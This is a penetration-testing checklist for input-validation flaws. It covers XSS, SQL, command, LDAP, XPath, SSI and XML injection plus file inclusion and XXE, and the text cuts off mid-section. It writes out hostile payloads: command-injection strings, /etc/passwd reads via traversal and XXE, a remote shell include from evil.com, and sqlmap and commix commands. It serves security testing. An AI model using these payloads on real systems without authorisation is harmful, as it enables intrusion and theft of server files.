



Data validation is the process of ensuring that a program operates with clean, correct, and useful data. Testing this involves intentionally inputting invalid, unexpected, or random data to see how the application handles it.

## Test for Cross Site Scripting (XSS)

> [!summary] 
> Cross-Site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. 

Tools: Browser, Burp Suite.



```bash
# Try inputting a script in any user-input fields.
<script>alert('XSS')</script>
```


##### Payload

* [XSS Vectors Cheat Sheet](https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45)



## Test for SQL Injection

> [!abstract] 
> SQL Injection involves inputting SQL statements in a field to try and manipulate the application's SQL queries. 


Tools: SQLmap, Browser, Burp Suite.


```bash
# Try inputting SQL statements in any user-input fields.
' OR '1'='1
# Or use sqlmap
sqlmap -u "http://www.example.com/page?param=value" --dbs
```


##### Cheat Sheet's

* [PortSwigger's SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)

##### Payload

* [SQL Injection Payload List on GitHub](https://github.com/payloadbox/sql-injection-payload-list)

##### Tools

* ➡️ [sqlmap](../../Tools/sqlmap/README.md)
- Burp Suite
- OWASP ZAP
- SQLmap
- Nikto
- Wireshark

##### Articles

* [SQL injection UNION attacks @ portswigger.net](https://portswigger.net/web-security/sql-injection/union-attacks)
* [SQL injection UNION attack @ medium.com](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) 


## Test for Command Injection

Tools: Commix, Browser, Burp Suite.

Command injection occurs when an attacker can inject and execute commands specified by the attacker in the vulnerable application.

```bash
# Try inputting command line commands in any user-input fields.
; ls

# Or in URL params 
http://example.com/ping?ip=10.10.217.166`ls`

# Or use Commix
commix -u "http://www.example.com/page?param=value"
```


##### Cheat Sheet's

- [Command Injection Cheatsheet - HackersOnlineClub](https://hackersonlineclub.com/command-injection-cheatsheet/)


## Test for Local File Inclusion (LFI) / Remote File Inclusion (RFI)

Tools: Browser, Burp Suite.

LFI involves including files that exist on the server's filesystem, while RFI involves including files from remote servers.

```bash
# For LFI, try to include local files.
../../etc/passwd
# For RFI, try to include remote files.
http://evil.com/shell.txt
```


## Test for XML External Entity (XXE) Attacks

Tools: Burp Suite.

XXE attacks involve exploiting XML parsers that process user input to execute files on the server, denial of service attacks, or perform other malicious activities.

```xml
<!-- Try to include local or remote entities in any XML inputs. -->
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
```


## Test for LDAP Injection

LDAP Injection is an attack technique used to exploit applications that construct LDAP statements based on user input.

Tools: Burp Suite, Browser.

```bash
# Try inputting LDAP statements in any user-input fields.
*)(uid=*))(|(uid=*
```


## Test for ORM Injection

ORM Injection is an attack using SQL, HQL or other injection attacks on ORM generated queries.

Tools: Burp Suite, SQLmap.

```bash
# The payloads are typically same as SQL injection.
' OR '1'='1
```

## Test for XML Injection

XML Injection testing is when a tester tries to inject an XML doc to the application. If the XML parser fails to contextually validate data, then the test will yield a positive result.

Tools: Burp Suite, OWASP ZAP.

```bash
# Input XML doc with malicious payload in user-input fields.
<foo><![CDATA[</foo><bar>]]></bar>

# ORr in POST Request

POST /product/stock HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: [length]

<?xml version="1.0" encoding="UTF-8"?>
<root>
  <foo><![CDATA[</foo><bar>]]></bar>
  <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <extra>&xxe;</extra>
</root>

```


##### Payloads

* [XXE Injection Payload List on GitHub](https://github.com/payloadbox/xxe-injection-payload-list)


## Test for SSI Injection

Server-Side Includes (SSI) Injection allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. 

Tools: Burp Suite, Browser.

```bash
# Try inputting SSI directives in any user-input fields.
<!--#exec cmd="/bin/ls" -->
```

## Test for XPath Injection

XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. 

Tools: Burp Suite, OWASP ZAP.

```bash
# Try inputting XPath queries in any user-input fields.
' or '1'='1
```

## Test for IMAP/SMTP Injection

IMAP/SMTP Injection is an attack technique used to exploit mail servers and webmail applications that construct IMAP/SMTP statements from user-supplied input, without properly validating or sanitizing the input before the mail query is made.

Tools: Burp Suite, Telnet.

```bash
# Try inputting IMAP/SMTP statements in any user-input fields.
a001 LOGIN "username" "password"
```


## Test for OS Commanding

OS command injection is a technique used when an application includes user-supplied data in a system-level command.

Tools: Comm




